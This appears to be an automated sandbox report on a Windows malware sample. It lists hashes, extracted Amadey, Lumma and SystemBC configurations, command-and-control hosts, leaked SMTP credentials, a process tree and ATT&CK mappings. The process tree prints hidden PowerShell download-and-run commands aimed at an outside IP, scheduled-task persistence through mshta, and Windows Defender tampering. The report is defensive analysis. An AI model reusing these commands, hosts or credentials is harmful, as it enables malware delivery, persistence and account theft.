Overview

overview

10

Static

static

3

8f28d4d626...fe.exe

windows7-x64

10

8f28d4d626...fe.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    147s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    22/02/2025, 01:30

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    8f28d4d62699c69dca48c1bd99f201f332121adae49047c7547e672e0a6f06fe.exe

  • Size

    2.0MB

  • MD5

    6d2823ba3507697ffa339fcfbbf50bb4

  • SHA1

    dd219c54f269a83ded50f04988316092ecab3d94

  • SHA256

    8f28d4d62699c69dca48c1bd99f201f332121adae49047c7547e672e0a6f06fe

  • SHA512

    8264f498304e565f1ef4f1331954fbe8c259d73471b9da8403bda3e9a7fb2dc5ffa794368d0d2b3cace3ddcbbf784b70d4d656ea761777689401935930b7d698

  • SSDEEP

    49152:kTZS63k6rR/cNiJZ+OWje721ML9kj8E5HxdroGZooOnNd6Z:kTZSZ6r1cNQZlWq72iZkjVdrouooONgZ

Score
10/10
amadeyhealerlummasystembc9c9aa5a4d2cddefense_evasiondiscoverydropperevasionexecutionpersistencespywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Credentials

  • Protocol:     smtp
  • Host:
    smtp.frontier.com
  • Port:
    587
  • Username:
    [email protected]
  • Password:
    Snowball1*-

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

amadey

Version

5.21

Botnet

a4d2cd

C2

http://cobolrationumelawrtewarms.com

http://�������� jlgenfekjlfnvtgpegkwr.xyz
Attributes
  • install_dir

    a58456755d

  • install_file

    Gxtuum.exe

  • strings_key

    00fadbeacf092dfd58b48ef4ac68f826

  • url_paths

    /3ofn3jf3e2ljk/index.php

rc4.plain

Extracted

Family

systembc

C2

towerbingobongoboom.com

93.186.202.3
Attributes
  • dns

    5.132.191.104

Extracted

Family

lumma

C2

https://governoagoal.pw/api

https://executrixfinav.pw/api

https://prideforgek.fun/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

    dropperhealer
  • Healer family
    healer
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

    stealerlumma
  • Lumma family
    lumma
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
    defense_evasiontrojan
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
    defense_evasiontrojan
  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

    trojansystembc
  • Systembc family
    systembc
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 16 IoCs
    defense_evasion
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

    execution
  • Downloads MZ/PE file 4 IoCs
  • Checks BIOS information in registry 2 TTPs 32 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 28 IoCs
  • Identifies Wine through registry keys 2 TTPs 16 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Loads dropped DLL 54 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Windows security modification 2 TTPs 2 IoCs
    defense_evasiontrojan
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 42 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
    adwarespyware
  • Modifies system certificate store 2 TTPs 3 IoCs
    defense_evasionspywaretrojan
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8f28d4d62699c69dca48c1bd99f201f332121adae49047c7547e672e0a6f06fe.exe
    "C:\Users\Admin\AppData\Local\Temp\8f28d4d62699c69dca48c1bd99f201f332121adae49047c7547e672e0a6f06fe.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:2116
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2888
      • C:\Users\Admin\AppData\Local\Temp\1090525001\8QQOJj9.exe
        "C:\Users\Admin\AppData\Local\Temp\1090525001\8QQOJj9.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2444
      • C:\Users\Admin\AppData\Local\Temp\1090607001\uXivbut.exe
        "C:\Users\Admin\AppData\Local\Temp\1090607001\uXivbut.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Loads dropped DLL
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:1812
        • C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
          "C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Downloads MZ/PE file
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1968
          • C:\Users\Admin\AppData\Local\Temp\10000160101\archive.exe
            "C:\Users\Admin\AppData\Local\Temp\10000160101\archive.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:2320
      • C:\Users\Admin\AppData\Local\Temp\1090673001\d2ef7c898e.exe
        "C:\Users\Admin\AppData\Local\Temp\1090673001\d2ef7c898e.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2356
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:1444
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          4⤵
            PID:780
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:1924
        • C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe
          "C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2952
          • C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe
            "C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:2220
        • C:\Users\Admin\AppData\Local\Temp\1090961001\HrCoDRP.exe
          "C:\Users\Admin\AppData\Local\Temp\1090961001\HrCoDRP.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:1964
          • C:\Users\Admin\AppData\Local\Temp\onefile_1964_133846615086222000\continental.exe
            C:\Users\Admin\AppData\Local\Temp\1090961001\HrCoDRP.exe
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:2596
        • C:\Users\Admin\AppData\Local\Temp\1090975101\6d6a2f5150.exe
          "C:\Users\Admin\AppData\Local\Temp\1090975101\6d6a2f5150.exe"
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:3000
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c schtasks /create /tn SEgxKmaOwBP /tr "mshta C:\Users\Admin\AppData\Local\Temp\oYPHuO9ch.hta" /sc minute /mo 25 /ru "Admin" /f
            4⤵
            • System Location Discovery: System Language Discovery
            PID:1752
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /tn SEgxKmaOwBP /tr "mshta C:\Users\Admin\AppData\Local\Temp\oYPHuO9ch.hta" /sc minute /mo 25 /ru "Admin" /f
              5⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:1516
          • C:\Windows\SysWOW64\mshta.exe
            mshta C:\Users\Admin\AppData\Local\Temp\oYPHuO9ch.hta
            4⤵
            • System Location Discovery: System Language Discovery
            • Modifies Internet Explorer settings
            PID:1804
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MYMAPCYCYPIM6QABZK30YDDWZSWE1L9O.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
              5⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Downloads MZ/PE file
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2768
              • C:\Users\Admin\AppData\Local\TempMYMAPCYCYPIM6QABZK30YDDWZSWE1L9O.EXE
                "C:\Users\Admin\AppData\Local\TempMYMAPCYCYPIM6QABZK30YDDWZSWE1L9O.EXE"
                6⤵
                • Modifies Windows Defender DisableAntiSpyware settings
                • Modifies Windows Defender Real-time Protection settings
                • Modifies Windows Defender TamperProtection settings
                • Modifies Windows Defender notification settings
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Windows security modification
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2288
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\Users\Admin\AppData\Local\Temp\1090976021\am_no.cmd" "
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2744
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1090976021\am_no.cmd" any_word
            4⤵
            • System Location Discovery: System Language Discovery
            PID:1808
            • C:\Windows\SysWOW64\timeout.exe
              timeout /t 2
              5⤵
              • System Location Discovery: System Language Discovery
              • Delays execution with timeout.exe
              PID:2000
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1956
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2136
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1960
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2516
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2332
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2164
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /tn "jfQVFma1Kke" /tr "mshta \"C:\Temp\JPROF3uX0.hta\"" /sc minute /mo 25 /ru "Admin" /f
              5⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:1060
            • C:\Windows\SysWOW64\mshta.exe
              mshta "C:\Temp\JPROF3uX0.hta"
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies Internet Explorer settings
              PID:2616
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                6⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2564
                • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                  "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                  7⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2504
        • C:\Users\Admin\AppData\Local\Temp\1091006001\9ae947e1c8.exe
          "C:\Users\Admin\AppData\Local\Temp\1091006001\9ae947e1c8.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          PID:2232
        • C:\Users\Admin\AppData\Local\Temp\1091007001\cf7484314b.exe
          "C:\Users\Admin\AppData\Local\Temp\1091007001\cf7484314b.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:1956
        • C:\Users\Admin\AppData\Local\Temp\1091008001\HrCoDRP.exe
          "C:\Users\Admin\AppData\Local\Temp\1091008001\HrCoDRP.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:2800
          • C:\Users\Admin\AppData\Local\Temp\onefile_2800_133846615247796000\continental.exe
            C:\Users\Admin\AppData\Local\Temp\1091008001\HrCoDRP.exe
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:1556
        • C:\Users\Admin\AppData\Local\Temp\1091009001\f126b3976b.exe
          "C:\Users\Admin\AppData\Local\Temp\1091009001\f126b3976b.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1052
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:1736
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            4⤵
              PID:1784
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
              4⤵
                PID:2744
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                4⤵
                  PID:1796
              • C:\Users\Admin\AppData\Local\Temp\1091010001\8QQOJj9.exe
                "C:\Users\Admin\AppData\Local\Temp\1091010001\8QQOJj9.exe"
                3⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:932
              • C:\Users\Admin\AppData\Local\Temp\1091011001\uXivbut.exe
                "C:\Users\Admin\AppData\Local\Temp\1091011001\uXivbut.exe"
                3⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                PID:1868
              • C:\Users\Admin\AppData\Local\Temp\1091012001\DF9PCFR.exe
                "C:\Users\Admin\AppData\Local\Temp\1091012001\DF9PCFR.exe"
                3⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                PID:1428
                • C:\Users\Admin\AppData\Local\Temp\1091012001\DF9PCFR.exe
                  "C:\Users\Admin\AppData\Local\Temp\1091012001\DF9PCFR.exe"
                  4⤵
                    PID:2444
                • C:\Users\Admin\AppData\Local\Temp\1091013001\ebp51gY.exe
                  "C:\Users\Admin\AppData\Local\Temp\1091013001\ebp51gY.exe"
                  3⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1512
                • C:\Users\Admin\AppData\Local\Temp\1091014001\ftS1RPn.exe
                  "C:\Users\Admin\AppData\Local\Temp\1091014001\ftS1RPn.exe"
                  3⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2648
                • C:\Users\Admin\AppData\Local\Temp\1091015001\cd0428aa83.exe
                  "C:\Users\Admin\AppData\Local\Temp\1091015001\cd0428aa83.exe"
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:2100
                • C:\Users\Admin\AppData\Local\Temp\1091016001\ccdcc345b6.exe
                  "C:\Users\Admin\AppData\Local\Temp\1091016001\ccdcc345b6.exe"
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:968
                • C:\Users\Admin\AppData\Local\Temp\1091017001\1d462f59fc.exe
                  "C:\Users\Admin\AppData\Local\Temp\1091017001\1d462f59fc.exe"
                  3⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  PID:3648
                • C:\Users\Admin\AppData\Local\Temp\1091018001\24e43c7921.exe
                  "C:\Users\Admin\AppData\Local\Temp\1091018001\24e43c7921.exe"
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3416
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    4⤵
                      PID:4104
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                      4⤵
                        PID:4324
                • C:\Windows\system32\taskeng.exe
                  taskeng.exe {05CD23E9-0D37-491E-AC21-4CA8D55906C5} S-1-5-21-1163522206-1469769407-485553996-1000:PJCSDMRP\Admin:Interactive:[1]
                  1⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2096
                  • C:\ProgramData\hqxwm\xtdmx.exe
                    C:\ProgramData\hqxwm\xtdmx.exe
                    2⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1884

                Network

                MITRE ATT&CK Enterprise v15

                Reconnaissance

                Resource Development

                Initial Access

                Execution

                Command and Scripting Interpreter

                1
                T1059

                PowerShell

                1
                T1059.001

                Scheduled Task/Job

                1
                T1053

                Scheduled Task

                1
                T1053.005

                Persistence

                Boot or Logon Autostart Execution

                1
                T1547

                Registry Run Keys / Startup Folder

                1
                T1547.001

                Create or Modify System Process

                4
                T1543

                Windows Service

                4
                T1543.003

                Scheduled Task/Job

                1
                T1053

                Scheduled Task

                1
                T1053.005

                Privilege Escalation

                Boot or Logon Autostart Execution

                1
                T1547

                Registry Run Keys / Startup Folder

                1
                T1547.001

                Create or Modify System Process

                4
                T1543

                Windows Service

                4
                T1543.003

                Scheduled Task/Job

                1
                T1053

                Scheduled Task

                1
                T1053.005

                Defense Evasion

                Impair Defenses

                5
                T1562

                Disable or Modify Tools

                5
                T1562.001

                Modify Registry

                8
                T1112

                Subvert Trust Controls

                1
                T1553

                Install Root Certificate

                1
                T1553.004

                Virtualization/Sandbox Evasion

                2
                T1497

                Credential Access

                Credentials from Password Stores

                1
                T1555

                Credentials from Web Browsers

                1
                T1555.003

                Unsecured Credentials

                2
                T1552

                Credentials In Files

                2
                T1552.001

                Discovery

                Query Registry

                4
                T1012

                System Information Discovery

                2
                T1082

                System Location Discovery

                1
                T1614

                System Language Discovery

                1
                T1614.001

                Virtualization/Sandbox Evasion

                2
                T1497

                Lateral Movement

                Collection

                Data from Local System

                2
                T1005

                Command and Control

                Exfiltration

                Impact

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Temp\JPROF3uX0.hta
                  Filesize

                  782B

                  MD5

                  16d76e35baeb05bc069a12dce9da83f9

                  SHA1

                  f419fd74265369666595c7ce7823ef75b40b2768

                  SHA256

                  456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7

                  SHA512

                  4063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\10000160101\archive.exe
                  Filesize

                  1.7MB

                  MD5

                  e303c7615eec08a0d01e0bee182677e2

                  SHA1

                  982abe91e9b478bead9378fee1ea44987d423c53

                  SHA256

                  3c464537e7a1baf4feeb085fa55078e8b990374764c6e8ef6b46daea5096626e

                  SHA512

                  038d45405fbe913f7c8fb2b68996ded84b55ee40f5fc52258c7b629ba7b0dd60fe2b4609b9b86bfb023acc8843fbefa2bfcbae4edb04b4ee9baa874ed132a42e

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\1090525001\8QQOJj9.exe
                  Filesize

                  2.8MB

                  MD5

                  0658a83d9b5dbbc9dd5bf50c1efbbf1a

                  SHA1

                  6ef596985aa7da0170706e9a0a71a9189534f66c

                  SHA256

                  567ed55e81371392654e71e8769ff899ef92b1c28d1deb4bbde3219a8872ec00

                  SHA512

                  2751bde5b88526f5caddabdbb5ce7214480e1d552b0aeae5888db02d8818a8c2bf71d5e6927cc22097ca62f206b98c6540a019bdb5ca2aa1fcc13260e3546a3c

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\1090607001\uXivbut.exe
                  Filesize

                  2.1MB

                  MD5

                  817caec31605801a67c847f63ce7bb20

                  SHA1

                  f023444245b780be58b0c6672a56a7deb8597424

                  SHA256

                  162d2eec1e9bbec8f7e160053cf1ea77f080c24df69ac427f474e468f955d1b6

                  SHA512

                  ca8abae689f303dab56eeaa8b29b89498c193693563c6fcd2419faf514062865c64b3e9894ec19e923051d458736f1b5efa28234e21ea7acc2ada881aa2fa936

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\1090673001\d2ef7c898e.exe
                  Filesize

                  6.6MB

                  MD5

                  6ea2a7f9508369885220226be0fd705d

                  SHA1

                  030757e8417498cf85867fe46f59ca6b6cf1498f

                  SHA256

                  6f024c0d869fe42a3da00c477b0234fb97dc6d4d576c4e897ddfc062add40478

                  SHA512

                  7d1bfeb83555004c930f2680482ab5fc6dde6e37ab067d0303a19b6bb9d2b4d59cc219e6bb4533f424dd5fcedbeff9930698049153b866a7434a0bd08500df3e

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe
                  Filesize

                  2.1MB

                  MD5

                  d59903af15c5257c5e274b297bec5e6d

                  SHA1

                  1d84da470c7821a2dbcc9a788e720a4bce32c8c4

                  SHA256

                  879785b2c857249d89f97b79ccb4ce25bbb8d1c60f4d003a23fdf1913f40fa2d

                  SHA512

                  2ab588a14cd70fa5684d1c82d13ddf48037499b7742fe7af5408044b0776ca4610a9f3780ad2fc302a03d7ce90932219b619fa117e33bfc5f0e860c2663dd42c

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\1090961001\HrCoDRP.exe
                  Filesize

                  13.6MB

